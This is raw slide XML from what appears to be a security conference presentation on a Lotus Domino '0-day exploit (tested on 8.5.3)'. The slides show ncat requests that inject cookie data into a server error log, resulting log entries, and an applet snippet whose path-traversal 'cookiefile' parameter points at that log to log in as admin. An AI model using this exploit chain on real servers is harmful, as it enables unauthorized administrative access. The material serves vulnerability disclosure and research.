                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>404 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NotFound</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -</a:t>
            </a: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7075020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16632"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XML cookie Injection</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Объект 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1268760"/>
            <a:ext cx="8229600" cy="4325112"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ncat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>targethost 49152</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GET /&lt;user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HTTP/1.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="pt-BR" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ncat targethost 49152</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GET /name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="admin"cookie="pass"address="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>111</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> HTTP/1.0</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1600" dirty="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="1600" dirty="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Номер слайда 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9D14D31A-0894-48B8-B9F2-A55D69D049F7}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395535" y="2843058"/>
            <a:ext cx="8748465" cy="3970318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>windows\system32\logfiles\httperr\httperr1.log:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#Software: Microsoft HTTP API 2.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#Version: 1.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#Date: 2011-08-22 09:19:16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#Fields: date time c-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> c-port s-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> s-port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-version </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-method </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cs-uri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-status </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smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>s-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>siteid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>s-reason s-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>queuename</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2011-08-22 09:19:16 10.10.10.101 46130 10.10.9.9  47001 - - - 400 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>BadRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2011-08-22 09:19:16 10.10.10.101 46234 10.10.9.9  47001 HTTP/1.0 </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GET /&lt;user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>404 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NotFound</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a: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r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2011-08-22 09:19:16 10.10.10.101 46234 10.10.9.9 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="admin"cookie="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pass“</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>111</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>404 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NotFound</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Овал 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1619672" y="5661248"/>
            <a:ext cx="360040" cy="28803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13118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8520" y="116632"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>about</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> client’s cert?</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Объект 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179512" y="1196752"/>
            <a:ext cx="8715436" cy="5072098"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a: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34</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-R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484784"/>
            <a:ext cx="4698972" cy="95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756952" y="1196752"/>
            <a:ext cx="1350498" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>console.jar</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Прямая со стрелкой 8"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2843808" y="2420888"/>
            <a:ext cx="0" cy="468052"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="F4740A"/>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9592" y="3032956"/>
            <a:ext cx="7507008" cy="3564396"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8653"/>
              <a:gd name="adj2" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="F4740A"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="812269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417984"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>0-day exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>tested on 8.5.3)</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Объект 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1988840"/>
            <a:ext cx="8229600" cy="4325112"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>applet name = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>DominoConsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>code = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>lotus.domino.console.DominoConsoleApplet.class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>codebase = "http://127.0.0.1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>domjava</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>/"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>archive = "dconsole.jar"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>width = "100%"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>height = "99</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>%“&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>&lt;PARAM NAME="debug" VALUE="true"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>&lt;PARAM NAME="port" VALUE="2050"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>&lt;PARAM NAME="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>useraddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>" VALUE="http://twitter/asintsov"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>&lt;PARAM NAME="username" VALUE="admin"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>&lt;PARAM NAME="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>cookiefile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>" VALUE="\..\..\..\windows\system32\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>logfiles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>httperr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>\httperr1.log"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>&lt;PARAM NAME="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>cookievalue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>" VALUE="pass"&gt;</a:t>
            </a:r>
